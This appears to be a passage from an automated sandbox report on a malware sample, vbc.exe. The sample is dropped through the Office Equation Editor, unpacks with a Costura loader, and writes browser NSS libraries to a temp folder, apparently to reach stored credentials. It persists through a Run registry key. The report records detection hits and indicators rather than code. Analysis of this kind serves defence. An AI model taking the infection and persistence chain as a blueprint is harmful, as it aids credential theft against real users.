              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: vbc.exe, 00000009.00000003.642227759.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.642836156.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: vbc.exe, 00000009.00000003.640776400.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.i386.pdb source: vbc.exe, 00000009.00000003.667949909.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671847447.000000000423C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668042331.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: vbc.exe, 00000009.00000003.651495835.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.652652345.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.651029417.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.651522611.0000000004258000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670824490.0000000004C84000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670867303.0000000004C88000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670800278.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655462519.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670765863.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670737148.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: vbc.exe, 00000009.00000003.643422773.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.643952487.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: vbc.exe, 00000009.00000003.669966606.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669869061.0000000004C14000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670084410.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdbGCTL source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658024434.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658085566.0000000000304000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: vbc.exe, 00000009.00000003.644622342.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.643952487.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: vbc.exe, 00000009.00000003.668106753.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668134020.0000000004BB8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.637012145.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668160871.0000000004BBC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668189443.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.636520930.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668238482.0000000004BC4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668313210.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668284155.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.639375514.0000000004274000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668341274.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.639342303.0000000004270000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668313210.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668284155.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.638371506.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670394280.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670466490.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670487269.0000000004C3C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670421304.0000000004C34000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.654923829.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670800278.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670765863.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670737148.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 4.2.vbc.exe.55b0000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.55b0000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.33694d0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.33694d0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.606099043.00000000023AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2640, type: MEMORYSTR
              .NET source code contains potential unpacker
              Source: vbc[1].exe.2.dr, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: vbc.exe.2.dr, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: Pthmzffh.exe.4.dr, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 4.2.vbc.exe.f20000.1.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 4.0.vbc.exe.f20000.0.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.6.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.16.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.14.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.1.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.8.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.2.vbc.exe.f20000.1.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.12.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.4.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.0.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.2.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.10.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 9.0.vbc.exe.f20000.3.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: 11.0.Pthmzffh.exe.c40000.0.unpack, Mdydxd/Parameter.cs.Net Code: SetMapping System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00266042 push eax; retf 4_2_00266071
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0026629B push esp; ret 4_2_002662C1
              Source: C:\Users\Public\vbc.exeCode function: 4_2_002662D8 push esp; ret 4_2_002662C1
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004CB674 push esp; retf 0050h4_2_004CB68D
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004CB78C pushfd ; retf 0050h4_2_004CB7A5
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004FDF40 push eax; retf 4_2_004FDF4D
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0052C210 pushad ; retf 4_2_0052C211
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040D86E push 0040D89Ch; ret 9_2_0040D894
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040D870 push 0040D89Ch; ret 9_2_0040D894
              Source: C:\Users\Public\vbc.exeCode function: 9_2_004140C0 push 004140ECh; ret 9_2_004140E4
              Source: C:\Users\Public\vbc.exeCode function: 9_2_004108C8 push 004108F4h; ret 9_2_004108EC
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040B0F7 push 0040B124h; ret 9_2_0040B11C
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040B0F8 push 0040B124h; ret 9_2_0040B11C
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00408080 push 004080B8h; ret 9_2_004080B0
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00408158 push 00408196h; ret 9_2_0040818E
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00408970 push 004089E4h; ret 9_2_004089DC
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00408994 push 004089E4h; ret 9_2_004089DC
              Source: C:\Users\Public\vbc.exeCode function: 9_2_004089AC push 004089E4h; ret 9_2_004089DC
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00415208 push 0041528Ch; ret 9_2_00415284
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040CA0C push 0040CA3Ch; ret 9_2_0040CA34
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040CA10 push 0040CA3Ch; ret 9_2_0040CA34
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00417AEC push 00417B18h; ret 9_2_00417B10
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00404BC0 push 00404C11h; ret 9_2_00404C09
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040D3C0 push 0040D3ECh; ret 9_2_0040D3E4
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040A3E4 push 0040A410h; ret 9_2_0040A408
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040C390 push 0040C3C0h; ret 9_2_0040C3B8
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040C394 push 0040C3C0h; ret 9_2_0040C3B8
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040A3AC push 0040A3D8h; ret 9_2_0040A3D0
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0041B3AE push cs; iretd 9_2_0041B3D9
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040DC44 push 0040DCA3h; ret 9_2_0040DC9B
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040DC0C push 0040DC38h; ret 9_2_0040DC30
              Source: msvcp140.dll.9.drStatic PE information: section name: .didat
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,9_2_0040B15C
              Source: vbc[1].exe.2.drStatic PE information: 0x99145F4B [Sun May 21 02:32:43 2051 UTC]
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\msvcp140.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\nss3.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\ucrtbase.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\vcruntime140.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\softokn3.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\mozglue.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\nssdbm3.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\freebl3.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\98EFC334\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PthmzffhJump to behavior
              Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PthmzffhJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_00417B1A
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
